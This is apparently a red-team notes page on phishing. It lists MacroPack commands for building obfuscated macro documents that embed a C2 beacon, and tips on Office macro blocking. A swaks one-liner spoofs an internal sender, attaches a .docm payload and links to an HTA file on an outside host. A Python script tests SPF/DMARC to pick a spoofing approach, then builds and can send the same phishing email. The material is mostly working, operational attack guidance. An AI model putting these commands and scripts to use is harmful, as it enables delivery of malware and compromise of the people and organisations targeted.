Phishing

Warning

WIP. Only basic commands have been added so far; they work well against test environments with basic security controls, i.e. the built-in Microsoft Defender AV.

These will most likely not work against any EDR solution. DYOR.

Word Macros

Important

.docx is Word's macro-free format: Word will not save VBA into a .docx, so a macro "in" a docx never runs. Build a .docm (macro-enabled OOXML) or a legacy .doc instead.

Current Office builds also block macros by default in files that carry the Mark of the Web (anything downloaded from the internet or saved from an email attachment), so the delivery path matters as much as the file type.

Focus on hta, docm and js payloads.

Macro pack

MacroPack Community is a tool used to automate obfuscation and generation of retro formats such as MS Office documents or VBS-like formats. It also handles various shortcut formats.

# List all supported file formats
macro_pack.exe --listformats

# List all available templates
macro_pack.exe --listtemplates

# Craft a payload
...

Note

The EmbedExe template (EMBED_EXE) has been quite good in the past, as it lets you embed your C2 payload directly as an exe or bin, using either an SMB beacon or an HTTP beacon.

An SMB beacon does not call out; it listens on a named pipe. So to find out whether it ran, link to it from a beacon you already have, trying the candidate hosts in turn ("spraying" the network) until one answers.

Sending Emails: swaks

To send emails through an SMTP server from the command line, swaks is your go-to tool.

It provides nice features for attaching documents, spoofing senders (`--from` sets both the envelope sender and the From: header), and authenticating to the server (`--auth-user` / `--auth-password`) when it will not relay anonymously. Keep in mind that spoofing an address in the target's own domain only lands if their mail server does not enforce SPF/DMARC on inbound mail, so check the domain's TXT records first.

Sending emails with payloads as attachments

# A link in the body works if the user will click it;
# otherwise attach the payload directly (or do both, as here)
# --from / --to : envelope sender and recipient; --from also fills the From: header, so the sender is spoofed as an internal address
# --server : the target's mail server
# --attach @totally-not-malicious.docm : attach the local file `totally-not-malicious.docm` to the email
# --suppress-data : don't echo the DATA section (the base64-encoded attachment) back to the terminal
swaks --from vladimir.putin@target.com --to sam.altman@target.com --header 'Subject: Company Notification' --body 'Hi Sam, we want to hear from you! Please complete the following survey. https://mywebsite.com/mysurvey.hta' --server 10.10.10.10 --attach @totally-not-malicious.docm --suppress-data
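The following is an added example, not code from the original notes or from swaks: a small Python pre-flight check for the sender spoofing the swaks one-liner relies on, plus a builder for the same message (spoofed internal From:, lure link in the body, .docm attached) using the standard library so the MIME structure can be inspected before anything is sent. The SPF and DMARC TXT records, the addresses and the attachment bytes are constructed placeholders; `send_message` is only shown for completeness and is not called.

```python
"""Pre-flight spoofing check and message builder for a macro-document phish.

Added example; not part of the original notes or of swaks. The DNS TXT
records, addresses and attachment contents below are constructed placeholders.
"""
from email.message import EmailMessage
import mimetypes
import smtplib  # only used by send_message(), which is never called here

# Constructed sample TXT records, as they might come back from a DNS lookup
# of target.com and _dmarc.target.com (hypothetical domain)
SAMPLE_SPF = "v=spf1 include:spf.protection.outlook.com -all"
SAMPLE_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc@target.com"

# Real IANA type for macro-enabled Word documents; not in every mimetypes DB
DOCM_TYPE = "application/vnd.ms-word.document.macroEnabled.12"


def spf_all_qualifier(txt: str) -> str:
    """Return the qualifier on the SPF 'all' mechanism: '+', '-', '~' or '?'.

    '-all' (fail) or '~all' (softfail) means a message claiming this domain
    from an unlisted IP is flagged; '+all' or no 'all' means SPF does not
    stop spoofing at all.
    """
    if not txt.lower().startswith("v=spf1"):
        raise ValueError("not an SPF record")
    for term in txt.split()[1:]:
        qual, mech = (term[0], term[1:]) if term[0] in "+-~?" else ("+", term)
        if mech.lower() == "all":
            return qual
    return "?"  # no 'all' mechanism: neutral by default


def dmarc_policy(txt: str) -> str:
    """Return the DMARC p= policy: 'none', 'quarantine' or 'reject'."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags.get("p", "none").lower()


def spoof_likely_blocked(spf_txt: str, dmarc_txt: str) -> bool:
    """True when a From: address in this domain, sent from an outside IP, is
    likely to be quarantined or rejected: failing SPF plus an enforcing DMARC.
    p=none only generates reports, so the spoofed mail would still land."""
    return (spf_all_qualifier(spf_txt) in ("-", "~")
            and dmarc_policy(dmarc_txt) in ("quarantine", "reject"))


def build_phish(sender: str, recipient: str, subject: str, body: str,
                attachment_name: str, attachment_bytes: bytes) -> EmailMessage:
    """Build the same message the swaks one-liner sends: spoofed From:,
    plain-text body carrying the lure link, and the payload as an attachment."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    if attachment_name.lower().endswith(".docm"):
        ctype = DOCM_TYPE
    else:
        ctype = mimetypes.guess_type(attachment_name)[0] or "application/octet-stream"
    maintype, subtype = ctype.split("/", 1)
    msg.add_attachment(attachment_bytes, maintype=maintype, subtype=subtype,
                       filename=attachment_name)
    return msg


def send_message(msg: EmailMessage, server: str, port: int = 25) -> None:
    """Hand the message to the target's mail server (the --server of swaks);
    the envelope sender is taken from msg['From']. Not called in this example."""
    with smtplib.SMTP(server, port) as smtp:
        smtp.send_message(msg)


if __name__ == "__main__":
    print("spoof likely blocked:", spoof_likely_blocked(SAMPLE_SPF, SAMPLE_DMARC))
    message = build_phish(
        "vladimir.putin@target.com", "sam.altman@target.com",
        "Company Notification",
        "Hi Sam, we want to hear from you! Please complete the following survey. "
        "https://mywebsite.com/mysurvey.hta",
        "totally-not-malicious.docm",
        b"<constructed placeholder, not a real docm>",
    )
    # Same view swaks gives you without --suppress-data
    print(message.as_string())
```

Run the DNS lookups yourself (`dig TXT target.com` and `dig TXT _dmarc.target.com`) and feed the answers to `spoof_likely_blocked`; a `True` means pick a look-alike domain you control rather than spoofing the target's own. The builder deliberately mirrors swaks' defaults so that what you inspect locally is what the server will see.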

Refs